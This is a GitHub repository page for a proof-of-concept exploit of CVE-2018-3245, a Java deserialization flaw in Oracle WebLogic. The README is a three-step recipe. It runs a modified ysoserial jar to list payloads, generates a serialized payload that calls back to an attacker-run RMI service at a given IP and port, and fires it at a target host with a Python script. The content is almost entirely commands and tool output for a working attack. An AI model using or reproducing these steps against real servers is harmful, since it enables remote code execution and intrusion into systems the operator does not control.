Skip to content
CVE-2018-3245-PoC
Branch: master
Clone or download
Latest commit 3f4b020 Oct 27, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Update README.md Oct 27, 2018
weblogic.py
ysoserial-cve-2018-3245.jar Add files via upload Oct 24, 2018

README.md

CVE-2018-3245

Step 1

java -jar ysoserial-cve-2018-3245.jar

WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-3245.jar [payload] '[command]'
Available payload types:
     Payload         Authors   Dependencies
     -------         -------   ------------
     CVE_2018_2893_1 @mbechler
     CVE_2018_2893_2 @mbechler
     CVE_2018_2893_3 @mbechler
     CVE_2018_3245   @mbechler
     JRMPClient      @mbechler
     Jdk7u21         @frohoff

Step 2

java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 "[RMI_SERVICE_IP]:[PORT]" > poc5.ser

Step 3

python weblogic.py [TARGET_HOST] [PORT] poc5.ser

You can’t perform that action at this time.